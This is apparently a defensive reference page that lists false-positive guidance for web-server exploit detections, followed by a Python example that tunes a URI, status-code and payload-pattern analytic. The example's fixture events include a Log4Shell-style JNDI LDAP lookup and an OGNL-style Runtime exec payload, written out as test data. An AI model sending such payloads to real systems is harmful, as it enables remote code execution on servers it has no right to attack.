LoFP / web server

Be aware of potential false positives: legitimate uses of the /webauth_operation.php endpoint may cause benign activity to be flagged. The URL in the analytic is specific to a successful attempt to exploit the vulnerability. Review the contents of the HTTP body to determine whether the request is malicious. If the request is benign, add the URL to the whitelist or continue to monitor.
False positives are limited to Zscaler configuration.
False positives are limited.
False positives are not expected, as the detection is based on the presence of web requests to the setupwizard.aspx page, which is not a page commonly accessed by legitimate users. Note that the analytic is limited to HTTP POST requests with a status of 200 to reduce false positives. Modify the query as needed to reduce false positives further or to hunt for additional indicators of compromise.
False positives are not expected, as this detection is based on monitoring HTTP POST requests to a specific endpoint with a status code of 200. However, ensure that legitimate requests to the `/wsstatusevents/eventhandler.asmx` endpoint are accounted for in the environment to avoid false positives.
False positives are not expected, as this detection is based on the presence of specific URI paths and HTTP methods that are indicative of exploitation of CVE-2024-27198. Monitor, filter, and tune as needed based on the organization's log sources.
False positives are not expected; however, monitor, filter, and tune as needed based on the organization's log sources. The analytic is restricted to GET requests returning status 200 to specific URI paths, which should limit false positives.
False positives are present when the values are set to 1 for utf and lookup. It's possible to raise this to TTP (direct notable) if other_lookups is removed and the score threshold is set to 2 (down from 4).
False positives may be possible; however, the analytic is restricted to HTTP status 200 and POST requests, based on the PoC. Upon investigation, review the POST body for the actual payload, or command, being executed.
False positives may be present based on the organization's use of Citrix ADC and Gateway. Filter, or restrict the analytic to Citrix devices only.
False positives may be present if the activity was blocked or was not successful. Filter known vulnerability scanners, and filter further as needed.
False positives may be present with legitimate applications. Attempt to filter by dest IP or use asset groups to restrict the analytic to Confluence servers.
False positives may be present, as this is based on the admin user accessing the PaperCut NG instance from a public IP address. Filter as needed.
False positives may be present; filter as needed.
False positives may occur and filtering may be required. Restrict the analytic to asset type.
False positives may occur depending on the web server's configuration. If the web server is intentionally configured to use the remote shellservlet, then detections by this analytic would not be considered true positives.
False positives may occur if legitimate PSWA processes are used for administrative tasks. Careful review of the logs is recommended to distinguish between legitimate and malicious activity.
False positives may occur if legitimate activity mimics the exploitation pattern. Review the context of the alerts and adjust the analytic parameters to better fit the specific environment.
False positives may occur; therefore, use the analytic as a jumping-off point to identify potential certificate store errors.
False positives should be limited, as this detection is based on a specific URL path and HTTP status code. Adjust the search as necessary to fit the environment.
False positives will be limited; however, tune or modify the query as needed.
False positives will be present based on the gateways in use; modify the status field as needed.
Filtering may be required in some instances; filter as needed.
If TeamCity is not in use, this analytic will not return results. Monitor and tune for your environment.
If WS_FTP Server is not in use, this analytic will not return results. Monitor and tune for your environment. Note that the Metasploit module only hits /aht/ and not the full /aht/ahtapiservice.asmx/authuser URL.
It is highly possible that you will find false positives; however, the base score is set to 2 for _any_ JNDI string found in raw logs. Tune and change as needed, including any filtering.
It's possible for legitimate HTTP requests to be made to URLs containing the suspicious paths.
No known false positives for this detection.
Similar to CVE-2023-35078, the exploitation path indicates that status=200 is required for successful exploitation of the vulnerability. False positives may be present if status=200 is removed from the search; if it is removed, the search will also alert on status=301 and status=404, which indicate unsuccessful exploitation attempts. Analysts may find it useful to hunt for these status codes as well, but doing so is likely to produce a significant number of alerts, as this is a widespread vulnerability.
Some of these processes may be used legitimately on web servers during maintenance or other administrative tasks.
The JSP file names are static names used in current proof-of-concept code.
The proof-of-concept exploit script indicates that status=200 is required for successful exploitation of the vulnerability. False positives may be present if status=200 is removed from the search; if it is removed, the search will also alert on status=301 and status=404, which indicate unsuccessful exploitation attempts. Analysts may find it useful to hunt for these status codes as well, but doing so is likely to produce a significant number of alerts, as this is a widespread vulnerability.
There might be false positives associated with this detection, since items like `args` as a web argument are fairly generic.
Tune based on assets if possible, or restrict to known Confluence servers. Remove the ${ for a broader query. To identify more exec calls, remove everything up to the last parameter (runtime().exec) for a broad query.
Very few legitimate Content-Type fields will have a length greater than 100 characters.
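The notes above keep returning to the same tuning knobs: restricting a URI-path analytic to POST and status=200 so that 301/404 attempts drop out, scoping to known assets such as Confluence servers, widening a payload pattern by removing the `${` opener or everything before `runtime().exec`, and flagging an oversized Content-Type header. The Python below is an added example, not code from LoFP or from any of the detections it indexes, that runs those knobs over constructed events. The event shape and field names (src, dest, http_method, status, uri_path, url, http_content_type), the asset group, and the sample payload strings are all assumptions made for the example.

```python
"""Toy web-request analytic exercising the tuning knobs the false-positive notes
describe: URI path + HTTP method + status code, asset scoping, narrow vs broad
payload patterns, and Content-Type length.  Field names are assumed and only
resemble common proxy/web-server field extractions, not any product's schema."""
import re
from urllib.parse import unquote

# Constructed sample events (not real traffic).  Addresses come from the
# documentation ranges; the payload strings exist only to feed the checks below.
EVENTS = [
    {"src": "203.0.113.10", "dest": "10.0.0.5", "http_method": "POST", "status": 200,
     "uri_path": "/wsstatusevents/eventhandler.asmx",
     "url": "/wsstatusevents/eventhandler.asmx", "http_content_type": "text/xml"},
    {"src": "203.0.113.10", "dest": "10.0.0.5", "http_method": "POST", "status": 404,
     "uri_path": "/wsstatusevents/eventhandler.asmx",
     "url": "/wsstatusevents/eventhandler.asmx", "http_content_type": "text/xml"},
    {"src": "198.51.100.7", "dest": "10.0.0.6", "http_method": "GET", "status": 301,
     "uri_path": "/setupwizard.aspx", "url": "/setupwizard.aspx", "http_content_type": ""},
    {"src": "198.51.100.7", "dest": "10.0.0.6", "http_method": "POST", "status": 200,
     "uri_path": "/setupwizard.aspx", "url": "/setupwizard.aspx",
     "http_content_type": "application/x-www-form-urlencoded"},
    # Oversized Content-Type carrying a JNDI lookup (Log4Shell-style probe).
    {"src": "192.0.2.3", "dest": "10.0.0.9", "http_method": "GET", "status": 200,
     "uri_path": "/", "url": "/",
     "http_content_type": "${jndi:ldap://192.0.2.3/" + "A" * 100 + "}"},
    # Long but legitimate multipart boundary stays under the 100-character threshold.
    {"src": "192.0.2.3", "dest": "10.0.0.9", "http_method": "POST", "status": 200,
     "uri_path": "/upload", "url": "/upload",
     "http_content_type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"},
    # Percent-encoded expression in the URL against an assumed Confluence host.
    {"src": "192.0.2.4", "dest": "10.0.0.7", "http_method": "GET", "status": 200,
     "uri_path": "/", "http_content_type": "",
     "url": "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%7D/"},
    # Same token in a search query on a non-Confluence host: a classic false positive.
    {"src": "192.0.2.4", "dest": "10.0.0.8", "http_method": "GET", "status": 200,
     "uri_path": "/search", "url": "/search?q=getRuntime().exec", "http_content_type": ""},
]

CONFLUENCE_SERVERS = {"10.0.0.7"}  # assumed asset group for scoping


def uri_analytic(events, paths, methods=("POST",), statuses=(200,), assets=None):
    """Return events hitting one of `paths` with an allowed method.

    statuses=None drops the status-code restriction (so 301/404 attempts also
    match); assets=None drops the asset scoping.
    """
    hits = []
    for e in events:
        if e["uri_path"] not in paths or e["http_method"] not in methods:
            continue
        if statuses is not None and e["status"] not in statuses:
            continue
        if assets is not None and e["dest"] not in assets:
            continue
        hits.append(e)
    return hits


def long_content_type(events, threshold=100):
    """Flag requests whose Content-Type header is longer than `threshold` characters."""
    return [e for e in events if len(e.get("http_content_type", "")) > threshold]


# Narrow form keeps the "${" expression opener; broad form drops everything
# up to the final runtime().exec token, as the Confluence note suggests.
NARROW_EXEC = re.compile(r"\$\{.*runtime\(\)\.exec", re.IGNORECASE)
BROAD_EXEC = re.compile(r"runtime\(\)\.exec", re.IGNORECASE)


def exec_injection(events, broad=False, assets=None):
    """Match URL-decoded request URLs against the narrow or broad exec pattern."""
    pattern = BROAD_EXEC if broad else NARROW_EXEC
    return [e for e in events
            if (assets is None or e["dest"] in assets)
            and pattern.search(unquote(e["url"]))]


def status_codes(hits):
    """Sorted status codes of a hit list, to show what relaxing a filter admits."""
    return sorted(e["status"] for e in hits)


if __name__ == "__main__":
    strict = uri_analytic(EVENTS, {"/setupwizard.aspx"})
    loose = uri_analytic(EVENTS, {"/setupwizard.aspx"}, methods=("GET", "POST"), statuses=None)
    print("setupwizard strict:", status_codes(strict), "loose:", status_codes(loose))
    print("long content-type:", [e["src"] for e in long_content_type(EVENTS)])
    print("exec narrow:", [e["dest"] for e in exec_injection(EVENTS)],
          "broad:", [e["dest"] for e in exec_injection(EVENTS, broad=True)],
          "broad+assets:", [e["dest"] for e in exec_injection(EVENTS, broad=True, assets=CONFLUENCE_SERVERS)])
```

Decoding the URL before matching matters: the expression opener arrives percent-encoded in real access logs, so a pattern applied to the raw field misses it. The broad pattern picks up the search-query event on the non-Confluence host, which is exactly the kind of hit that asset scoping is meant to remove.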